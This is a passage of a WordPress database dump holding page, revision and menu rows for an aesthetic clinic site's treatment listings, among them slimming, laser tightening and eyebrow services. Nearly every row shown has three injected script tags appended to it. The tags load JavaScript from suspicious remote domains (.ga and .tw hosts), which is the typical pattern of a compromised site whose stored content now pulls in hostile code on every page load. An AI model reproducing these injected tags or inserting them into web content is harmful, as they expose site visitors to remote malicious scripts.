Counturing (per area)','','publish','closed','closed','','aesthetic-solutions-6-2','','','2018-01-03 04:17:21','2018-01-03 04:17:21','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6502',0,'page','',0),(6503,1,'2018-01-03 04:17:21','2018-01-03 04:17:21','<ol>\r\n 	<li>Tummy</li>\r\n 	<li>Tights</li>\r\n 	<li>Upperarms</li>\r\n 	<li>Back Body</li>\r\n 	<li>Lower Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Body Counturing (per area)','','inherit','closed','closed','','6502-revision-v1','','','2018-01-03 04:17:21','2018-01-03 04:17:21','',6502,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6502-revision-v1/',0,'revision','',0),(6504,1,'2018-01-03 04:18:00','2018-01-03 04:18:00',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6504','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6504',55,'nav_menu_item','',0),(6505,1,'2018-01-03 04:18:53','2018-01-03 04:18:53','<strong>CAVITATION BODY SLIM ( PER AREA )</strong>\r\n<ol>\r\n 	<li>           Tummy</li>\r\n 	<li>           Tights</li>\r\n 	<li>           Back Body</li>\r\n 	<li>           Lower Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cavitation Body Slim (per area)','','publish','closed','closed','','aesthetic-solutions-6-3','','','2018-01-03 04:18:53','2018-01-03 04:18:53','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6505',0,'page','',0),(6506,1,'2018-01-03 04:18:53','2018-01-03 04:18:53','<strong>CAVITATION BODY SLIM ( PER AREA )</strong>\r\n<ol>\r\n 	<li>           Tummy</li>\r\n 	<li>           Tights</li>\r\n 	<li>           Back Body</li>\r\n 	<li>           Lower Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cavitation Body Slim (per area)','','inherit','closed','closed','','6505-revision-v1','','','2018-01-03 04:18:53','2018-01-03 04:18:53','',6505,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6505-revision-v1/',0,'revision','',0),(6507,1,'2018-01-03 04:19:24','2018-01-03 04:19:24',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6507','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6507',56,'nav_menu_item','',0),(6508,1,'2018-01-03 04:20:13','2018-01-03 04:20:13','<strong>SLIMMING PACKAGE TREATMENT ( PER AREA )</strong>\r\n\r\n<em>Include Body massage slimming, ultrasound cavitation and Radio Frequency Body Counturing.</em>\r\n\r\n<em> </em>\r\n\r\n<em>         </em>  6x Slimming Treatment\r\n\r\n10x Slimming Treatment<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Slimming Package Treatment (per area)','','publish','closed','closed','','aesthetic-solutions-6-4','','','2018-01-03 04:20:13','2018-01-03 04:20:13','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6508',0,'page','',0),(6509,1,'2018-01-03 04:20:13','2018-01-03 04:20:13','<strong>SLIMMING PACKAGE TREATMENT ( PER AREA )</strong>\r\n\r\n<em>Include Body massage slimming, ultrasound cavitation and Radio Frequency Body Counturing.</em>\r\n\r\n<em> </em>\r\n\r\n<em>         </em>  6x Slimming Treatment\r\n\r\n10x Slimming Treatment<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Slimming Package Treatment (per area)','','inherit','closed','closed','','6508-revision-v1','','','2018-01-03 04:20:13','2018-01-03 04:20:13','',6508,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6508-revision-v1/',0,'revision','',0),(6510,1,'2018-01-03 04:20:46','2018-01-03 04:20:46',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6510','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6510',57,'nav_menu_item','',0),(6511,1,'2018-01-03 04:22:03','2018-01-03 04:22:03','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intimalase / Laser Vaginal Tightening','','publish','closed','closed','','aesthetic-solutions-7-2','','','2018-01-03 04:22:03','2018-01-03 04:22:03','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6511',0,'page','',0),(6512,1,'2018-01-03 04:22:03','2018-01-03 04:22:03','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intimalase / Laser Vaginal Tightening','','inherit','closed','closed','','6511-revision-v1','','','2018-01-03 04:22:03','2018-01-03 04:22:03','',6511,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6511-revision-v1/',0,'revision','',0),(6513,1,'2018-01-03 04:22:46','2018-01-03 04:22:46',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6513','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6513',59,'nav_menu_item','',0),(6514,1,'2018-01-03 04:23:33','2018-01-03 04:23:33','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nLabia Brightening and Tightening\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Labia Rejuvenation','','publish','closed','closed','','aesthetic-solutions-7-3','','','2018-01-03 04:23:33','2018-01-03 04:23:33','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6514',0,'page','',0),(6515,1,'2018-01-03 04:23:33','2018-01-03 04:23:33','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nLabia Brightening and Tightening\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Labia Rejuvenation','','inherit','closed','closed','','6514-revision-v1','','','2018-01-03 04:23:33','2018-01-03 04:23:33','',6514,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6514-revision-v1/',0,'revision','',0),(6516,1,'2018-01-03 04:24:14','2018-01-03 04:24:14',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6516','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6516',60,'nav_menu_item','',0),(6517,1,'2018-01-03 04:25:14','2018-01-03 04:25:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Incontilase / Stress Ulinary Laser','','publish','closed','closed','','aesthetic-solutions-7-4','','','2018-01-03 04:25:14','2018-01-03 04:25:14','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6517',0,'page','',0),(6518,1,'2018-01-03 04:25:14','2018-01-03 04:25:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Incontilase / Stress Ulinary Laser','','inherit','closed','closed','','6517-revision-v1','','','2018-01-03 04:25:14','2018-01-03 04:25:14','',6517,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6517-revision-v1/',0,'revision','',0),(6519,1,'2018-01-03 04:25:44','2018-01-03 04:25:44',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6519','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6519',61,'nav_menu_item','',0),(6520,1,'2018-01-03 04:26:35','2018-01-03 04:26:35','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Tightening Laser / Area','','publish','closed','closed','','aesthetic-solutions-7-5','','','2018-01-03 04:26:35','2018-01-03 04:26:35','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6520',0,'page','',0),(6521,1,'2018-01-03 04:26:35','2018-01-03 04:26:35','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Tightening Laser / Area','','inherit','closed','closed','','6520-revision-v1','','','2018-01-03 04:26:35','2018-01-03 04:26:35','',6520,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6520-revision-v1/',0,'revision','',0),(6522,1,'2018-01-03 04:27:05','2018-01-03 04:27:05',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6522','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6522',62,'nav_menu_item','',0),(6523,1,'2018-01-03 04:27:45','2018-01-03 04:27:45','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Breast Tightening','','publish','closed','closed','','aesthetic-solutions-7-6','','','2018-01-03 04:27:45','2018-01-03 04:27:45','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6523',0,'page','',0),(6524,1,'2018-01-03 04:27:45','2018-01-03 04:27:45','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Breast Tightening','','inherit','closed','closed','','6523-revision-v1','','','2018-01-03 04:27:45','2018-01-03 04:27:45','',6523,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6523-revision-v1/',0,'revision','',0),(6525,1,'2018-01-03 04:28:15','2018-01-03 04:28:15',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6525','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6525',63,'nav_menu_item','',0),(6526,1,'2018-01-03 04:28:58','2018-01-03 04:28:58','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Strechmark Laser Reduction','','publish','closed','closed','','aesthetic-solutions-7-7','','','2018-01-03 04:28:58','2018-01-03 04:28:58','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6526',0,'page','',0),(6527,1,'2018-01-03 04:28:58','2018-01-03 04:28:58','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Strechmark Laser Reduction','','inherit','closed','closed','','6526-revision-v1','','','2018-01-03 04:28:58','2018-01-03 04:28:58','',6526,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6526-revision-v1/',0,'revision','',0),(6528,1,'2018-01-03 04:29:25','2018-01-03 04:29:25',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6528','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6528',64,'nav_menu_item','',0),(6529,1,'2018-01-03 04:30:09','2018-01-03 04:30:09','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Vein Laser Reduction','','publish','closed','closed','','aesthetic-solutions-7-8','','','2018-01-03 04:30:09','2018-01-03 04:30:09','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6529',0,'page','',0),(6530,1,'2018-01-03 04:30:09','2018-01-03 04:30:09','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Vein Laser Reduction','','inherit','closed','closed','','6529-revision-v1','','','2018-01-03 04:30:09','2018-01-03 04:30:09','',6529,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6529-revision-v1/',0,'revision','',0),(6531,1,'2018-01-03 04:30:48','2018-01-03 04:30:48',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6531','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6531',65,'nav_menu_item','',0),(6532,1,'2018-01-03 04:31:48','2018-01-03 04:31:48','<strong>CLEAR STEP / NAIL REJUVENATION LASER</strong>\r\n<ol>\r\n 	<li>        Finger Nails</li>\r\n 	<li>        Toe Nails</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Clear Step / Nail Rejuvenation Laser','','publish','closed','closed','','aesthetic-solutions-7-9','','','2018-01-03 04:31:48','2018-01-03 04:31:48','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6532',0,'page','',0),(6533,1,'2018-01-03 04:31:48','2018-01-03 04:31:48','<strong>CLEAR STEP / NAIL REJUVENATION LASER</strong>\r\n<ol>\r\n 	<li>        Finger Nails</li>\r\n 	<li>        Toe Nails</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Clear Step / Nail Rejuvenation Laser','','inherit','closed','closed','','6532-revision-v1','','','2018-01-03 04:31:48','2018-01-03 04:31:48','',6532,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6532-revision-v1/',0,'revision','',0),(6534,1,'2018-01-03 04:32:20','2018-01-03 04:32:20',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6534','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6534',66,'nav_menu_item','',0),(6535,1,'2018-01-03 04:33:14','2018-01-03 04:33:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Nightlase / Snoring Laser Reduction','','publish','closed','closed','','aesthetic-solutions-7-10','','','2018-01-03 04:33:14','2018-01-03 04:33:14','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6535',0,'page','',0),(6536,1,'2018-01-03 04:33:14','2018-01-03 04:33:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Nightlase / Snoring Laser Reduction','','inherit','closed','closed','','6535-revision-v1','','','2018-01-03 04:33:14','2018-01-03 04:33:14','',6535,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6535-revision-v1/',0,'revision','',0),(6537,1,'2018-01-03 04:33:44','2018-01-03 04:33:44',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6537','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6537',67,'nav_menu_item','',0),(6538,1,'2018-01-03 04:34:49','2018-01-03 04:34:49','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Eyebrow','','publish','closed','closed','','aesthetic-solutions-8-2','','','2018-01-03 04:34:49','2018-01-03 04:34:49','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6538',0,'page','',0),(6539,1,'2018-01-03 04:34:49','2018-01-03 04:34:49','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Eyebrow','','inherit','closed','closed','','6538-revision-v1','','','2018-01-03 04:34:49','2018-01-03 04:34:49','',6538,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6538-revision-v1/',0,'revision','',0),(6540,1,'2018-01-03 04:35:22','2018-01-03 04:35:22',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6540','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6540',69,'nav_menu_item','',0),(6541,1,'2018-01-03 04:35:54','2018-01-03 04:35:54','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Eyeliner','','publish','closed','closed','','aesthetic-solutions-8-3','','','2018-01-03 04:35:54','2018-01-03 04:35:54','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6541',0,'page','',0),(6542,1,'2018-01-03 04:35:54','2018-01-03 04:35:54','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Eyeliner','','inherit','closed','closed','','6541-revision-v1','','','2018-01-03 04:35:54','2018-01-03 04:35:54','',6541,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6541-revision-v1/',0,'revision','',0),(6543,1,'2018-01-03 04:36:22','2018-01-03 04:36:22',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6543','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6543',70,'nav_menu_item','',0),(6544,1,'2018-01-03 04:36:58','2018-01-03 04:36:58','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Lips','','publish','closed','closed','','aesthetic-solutions-8-4','','','2018-01-03 04:36:58','2018-01-03 04:36:58','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6544',0,'page','',0),(6545,1,'2018-01-03 04:36:58','2018-01-03 04:36:58','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Lips','','inherit','closed','closed','','6544-revision-v1','','','2018-01-03 04:36:58','2018-01-03 04:36:58','',6544,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6544-revision-v1/',0,'revision','',0),(6546,1,'2018-01-03 04:37:26','2018-01-03 04:37:26',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6546','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6546',71,'nav_menu_item','',0),(6547,1,'2018-01-03 04:38:12','2018-01-03 04:38:12','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Scar','','publish','closed','closed','','aesthetic-solutions-9-2','','','2018-01-03 04:38:12','2018-01-03 04:38:12','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6547',0,'page','',0),(6548,1,'2018-01-03 04:38:12','2018-01-03 04:38:12','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Scar','','inherit','closed','closed','','6547-revision-v1','','','2018-01-03 04:38:12','2018-01-03 04:38:12','',6547,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6547-revision-v1/',0,'revision','',0),(6549,1,'2018-01-03 04:38:43','2018-01-03 04:38:43',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6549','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6549',73,'nav_menu_item','',0),(6550,1,'2018-01-03 04:39:21','2018-01-03 04:39:21','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Pigment','','publish','closed','closed','','aesthetic-solutions-9-3','','','2018-01-03 04:39:21','2018-01-03 04:39:21','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6550',0,'page','',0),(6551,1,'2018-01-03 04:39:21','2018-01-03 04:39:21','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Pigment','','inherit','closed','closed','','6550-revision-v1','','','2018-01-03 04:39:21','2018-01-03 04:39:21','',6550,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6550-revision-v1/',0,'revision','',0),(6552,1,'2018-01-03 04:39:50','2018-01-03 04:39:50',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' 